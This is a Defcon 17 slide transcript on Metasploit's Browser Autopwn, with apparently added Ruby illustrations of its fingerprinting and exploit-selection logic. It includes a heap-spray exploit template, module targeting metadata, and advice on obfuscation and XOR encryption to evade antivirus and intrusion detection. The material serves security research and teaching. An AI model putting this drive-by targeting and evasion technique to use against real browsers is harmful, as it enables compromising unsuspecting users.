Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn
Presented at Defcon 17 (slide transcript)

Using Guided Missiles in Drive-bys
Automatic browser fingerprinting and exploitation with the Metasploit Framework: Browser Autopwn
James Lee
Browser Autopwn
● Auxiliary module for the Metasploit Framework
● Fingerprints a client
● Determines what exploits might work
● Used to suck
● Now it doesn't
Outline
● Intro
● Cluster bombs
● Guided missiles
  ● Fingerprinting and targeting
● Stealth
● Demos
● Commercial comparison
# whoami
● James Lee
● egypt
● Co-Founder, Teardrop Security
● Developer, Metasploit Project
My Involvement in MSF
● Started submitting patches and bug reports in 2007
● HD gave me commit access in April 2008
● Broke the repo April 2008
The Metasploit Framework
● Created by HD Moore in 2003
  ● ncurses based game
  ● Later became a real exploit framework in perl
● Rewritten in ruby in 2005
  ● Which is way better than python
● Extensible framework for writing exploits
I <3 MSF
● Modular payloads and encoders
● Many protocols already implemented
● Many non-exploit tools
● All kinds of exploits
  ● Traditional server-side
  ● Client-sides
Why Clientsides
● Karmetasploit
● Any other tool that gets you in the middle
● Users are weakest link, blah, blah, blah
● See Chris Gates
Client Exploits in MSF
● Extensive HTTP support
● Heap spray in two lines of code
● Sotirov's .NET DLL, heap feng shui
● Wide range of protocol-level IDS evasion
● Simple exploit in ~10 lines of code
Simple Exploit
```ruby
content = "<html><body>" \
  "<object id='obj' classid='...'></object>" \
  "<script>" \
  "#{js_heap_spray}" \
  "sprayHeap(#{payload.encoded}, #{target.ret}, 0x4000);" \
  "obj.VulnMethod(#{[target.ret].pack('V') * 1000});" \
  "</script></body></html>"
send_response(client, content)
```
Or Arbitrarily Complex
● ani_loadimage_chunksize is 581 lines of code
● As of June 28, MSF has 85 browser exploit modules
Problem
Solution
Cluster Bomb Approach
● Is it IE? Send all the IE sploits
● Is it FF? Send all the FF sploits
● Originally exploits were ad hoc
● Pain in the ass when new sploits come out
Problem
Solution
Guided Missile Approach
● Better client and OS fingerprinting
  ● Less likely to crash or hang the browser
● Only send exploits likely to succeed
  ● Browser is IE7? Don't send IE6 sploits, etc.
Fingerprinting the Client
● User Agent
  ● Easy to spoof
  ● Easy to change in a proxy
  ● A tiny bit harder to change in JS
Fingerprinting the Client
● Various JS objects only exist in one browser
  ● window.opera, Array.every
● Some only exist in certain versions
  ● window.createPopup, Array.every, window.Iterator
● Rendering differences and parser bugs
  ● IE's conditional comments
Internet Explorer
● Parser bugs, conditional comments
  ● Reliable, but not precise
● ScriptEngine*Version()
  ● Almost unique across all combinations of client and OS
  ● Brought to my attention by Jerome Athias
Opera
● window.opera.version()
  ● Includes minor version, e.g. "9.61"
Hybrid Approach for FF
● Existence of document.getElementsByClassName means Firefox 3.0
● If User Agent says IE6, go with FF 3.0
● If UA says FF 3.0.8, it's probably not lying, so use the more specific value
Safari
● Still in progress
● Existence of window.console
  ● If Firebug is installed on FF, shows up there, too
● Availability of window.onmousewheel
  ● Defaults to null, so have to check typeof
Fingerprinting the OS
● User Agent
● Could use something like p0f
● From the server side, that's about it
Internet Explorer
● Again, ScriptEngine*Version()
  ● Almost unique across all combinations of client and OS, including service pack
Opera
● Each build has a unique opera.buildNumber()
  ● Gives platform, but nothing else
Firefox
● navigator.platform and friends are affected by the User Agent string
● navigator.oscpu isn't
  ● "Linux i686"
  ● "Windows NT 6.0"
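The "Hybrid Approach for FF" and the Firefox OS slides above describe one reconciliation rule: a client-side feature test decides browser family and major version, the User-Agent header is trusted only for finer detail when it agrees, and navigator.oscpu decides the OS because the UA string does not. The following is an added illustration of that rule, not Browser Autopwn's own code; the `js` hash and its `get_elements_by_class_name` / `oscpu` keys stand in for whatever the fingerprinting script posts back.

```ruby
# Added illustration of the slides' hybrid Firefox fingerprinting; not
# Browser Autopwn's own code.  `js` stands in for the values the client-side
# script reports back (assumed keys: :get_elements_by_class_name, :oscpu).

# What the User-Agent header claims.  Returns nil for an unrecognised UA.
def ua_claims(ua)
  case ua
  when %r{Firefox/([\d.]+)} then { name: "Firefox", version: $1 }
  when /MSIE ([\d.]+)/      then { name: "MSIE",    version: $1 }
  when %r{Opera/([\d.]+)}   then { name: "Opera",   version: $1 }
  end
end

# OS from navigator.oscpu (slide 27: "Linux i686", "Windows NT 6.0"), which
# spoofing the UA does not change; fall back to the UA when oscpu is absent.
def os_from(oscpu, ua)
  case (oscpu || ua)
  when /Windows/ then "Windows"
  when /Linux/   then "Linux"
  when /Mac OS/  then "Mac OS X"
  else "Unknown"
  end
end

# js[:get_elements_by_class_name] is the client-side result of
# `typeof document.getElementsByClassName != 'undefined'`, which the slides
# treat as the marker for Firefox 3.0.
def fingerprint(ua, js)
  claim = ua_claims(ua)
  browser =
    if js[:get_elements_by_class_name]
      if claim && claim[:name] == "Firefox" && claim[:version].start_with?("3.")
        # UA agrees with the feature test, so keep its more specific version.
        { name: "Firefox", version: claim[:version], from: :ua }
      else
        # UA is spoofed, proxied or unrecognised: the feature test wins.
        { name: "Firefox", version: "3.0", from: :feature }
      end
    else
      # No FF 3 marker: most UAs don't lie, so go with the claim.
      (claim || { name: "Unknown", version: nil }).merge(from: :ua)
    end
  browser.merge(os: os_from(js[:oscpu], ua))
end
```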
Others
● Really all we're left with is the User Agent
● That's okay, most don't lie
  ● And those that do are likely to be patched anyway
● Generic, works everywhere when UA is not spoofed
Future Fingerprinting
● QuickTime
● Adobe
● Less well-known third party stuff
ActiveX
● "new ActiveXObject()" works if you have the class name
● Otherwise, IE doesn't seem to have a generic way to tell if an ActiveX object got created
  ● document.write("<object ...>")
  ● document.createElement("object")
Solution
● typeof(obj.method)
  ● 'undefined' if the object failed to initialize
  ● 'unknown' or possibly a real type if it worked
Target Acquired
What is it Vulnerable to?
● Coarse determination server-side
  ● JavaScript builds fingerprint, sends it back to the server
  ● Server sends sploits that match the browser and OS, possibly version
● Fine determination client-side
  ● navigator.javaEnabled exists, try mozilla_navigatorjava
Select a Missile
● Sort by reliability
● Exploits contain their own JS tests
Problem
Solution
Obfuscation
● Randomize identifiers
● Build strings from other things
● JSON / AJAX
● Obfuscation is not crypto
Encryption
● Put a key in the URL
  ● Not available in the standalone script
● Simple XOR is enough to beat AV and NIDS
  ● If they figure it out, it's easy to make the crypto stronger
Demonstrations
And we're back...
● I hope that worked
● Now how do YOU make exploits work within this framework?
Writing Exploits
● Add autopwn_info() to top of exploit class
● :ua_name is an array of browsers this exploit will work against
● :vuln_test is some javascript to test for the vulnerability (unless it's ActiveX)
  ● Usually comes directly from the exploit anyway
Example: mozilla_navigatorjava
```ruby
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
  :ua_name    => HttpClients::FF,
  :javascript => true,
  :rank       => NormalRanking, # reliable memory corruption
  :vuln_test  => %Q|
    if (window.navigator.javaEnabled && window.navigator.javaEnabled()) {
      is_vuln = true;
    }
  |,
})
```
Example: ms06_067_keyframe
```ruby
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
  :ua_name    => HttpClients::IE,
  :javascript => true,
  :os_name    => OperatingSystems::WINDOWS,
  :vuln_test  => 'KeyFrame',
  :classid    => 'DirectAnimation.PathControl',
  :rank       => NormalRanking # reliable memory corruption
})
```
Example: winzip_fileview
```ruby
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
  :ua_name    => HttpClients::IE,
  :javascript => true,
  :os_name    => OperatingSystems::WINDOWS,
  :vuln_test  => 'CreateFolderFromName',
  :classid    => '{A09AE68F-B14D-43ED-B713-BA413F034904}',
  :rank       => NormalRanking # reliable memory corruption
})
```
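The "What is it Vulnerable to?", "Select a Missile" and "Writing Exploits" slides describe how the autopwn_info metadata above drives targeting: coarse selection on the server filters modules by browser, OS and JavaScript support and orders them by rank, and fine determination is left to each module's own :vuln_test. The following added example (not Browser Autopwn's own code) implements that selection over the three autopwn_info hashes from the slides; the HttpClients, OperatingSystems and *Ranking constants are stand-ins for Metasploit's, and "hypothetical_plugin_bug" is a constructed entry included only to show an :ua_name array and a lower rank.

```ruby
# Added example of the targeting step the slides describe; not Browser
# Autopwn's own code.  Constants are stand-ins for Metasploit's
# HttpClients::*, OperatingSystems::* and *Ranking values.
module HttpClients;      IE = "MSIE"; FF = "Firefox"; end
module OperatingSystems; WINDOWS = "Windows"; LINUX = "Linux"; end
NormalRanking = 300
LowRanking    = 100

# The slides' three autopwn_info hashes plus one constructed entry.
MODULES = {
  "mozilla_navigatorjava" => {
    ua_name: HttpClients::FF, javascript: true, rank: NormalRanking,
    vuln_test: "if (window.navigator.javaEnabled && window.navigator.javaEnabled()) { is_vuln = true; }",
  },
  "ms06_067_keyframe" => {
    ua_name: HttpClients::IE, javascript: true, os_name: OperatingSystems::WINDOWS,
    vuln_test: "KeyFrame", classid: "DirectAnimation.PathControl", rank: NormalRanking,
  },
  "winzip_fileview" => {
    ua_name: HttpClients::IE, javascript: true, os_name: OperatingSystems::WINDOWS,
    vuln_test: "CreateFolderFromName", classid: "{A09AE68F-B14D-43ED-B713-BA413F034904}",
    rank: NormalRanking,
  },
  "hypothetical_plugin_bug" => {   # constructed for this example, not a real module
    ua_name: [HttpClients::FF, HttpClients::IE], javascript: true, rank: LowRanking,
    vuln_test: "if (typeof navigator.plugins != 'undefined') { is_vuln = true; }",
  },
}

# Coarse match: the browser must be listed (:ua_name may be one name or an
# array), the OS must match when the module names one, and a module that
# needs JavaScript is skipped for a client that reported none.
def matches?(info, fp)
  Array(info[:ua_name]).include?(fp[:ua_name]) &&
    (info[:os_name].nil? || info[:os_name] == fp[:os_name]) &&
    (!info[:javascript] || fp[:javascript])
end

# Module names in firing order: highest rank first, name as a tie-breaker.
def select_modules(fp, modules = MODULES)
  modules.select { |_, info| matches?(info, fp) }
         .sort_by { |name, info| [-info[:rank], name] }
         .map(&:first)
end

# Fine determination.  Plain modules ship JS that sets is_vuln themselves.
# ActiveX modules give a method name instead; per the typeof slide, the
# test is typeof on that method of an object built from :classid, where
# 'undefined' means the control never initialised.
def vuln_test_js(info)
  return info[:vuln_test] unless info[:classid]
  "if (typeof(obj.#{info[:vuln_test]}) != 'undefined') { is_vuln = true; }"
end
```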
Browser Autopwn Summary
● Reliable Target Acquisition
● Smart Missile Selection
● Stealthy from an AV perspective
● Easy to extend
● Detection results stored in a database
Commercial Comparison
● Mpack
● Firepack
● Neosploit
● Luckysploit
Mpack, Firepack
● Hard to acquire
● Old exploits
● Detection is only server-side
● Hard to change or update exploits
● Obfuscation + XOR
Neosploit
● Compiled ELFs run as CGI
● Unless you get the source or do some RE, you won't really know what it does
Luckysploit
● Real crypto (RSA, RC4)
● Even harder to acquire
Browser Autopwn
● Easy to write new exploits or take out old ones
● Free (three-clause BSD license)
● Easy to get (http://metasploit.com)
● Not written in PHP
● OS and client detection is client-side, more reliable in presence of spoofed or borked UA
Future
● More flexible payload selection
● Stop when you get a shell
  ● Maybe impossible in presence of NAT/proxies
● Easier-to-use JS obfuscation
● UAProf for mobile devices
● Integration with MetaPhish
Download it
● svn co http://metasploit.com/svn/framework3/trunk
● Submit patches to [email protected]
Thanks
● hdm, valsmith, tebo, mc, cg, Dean de Beer, pragmatk
● Everybody who helped with testing
● Whoever created ActiveX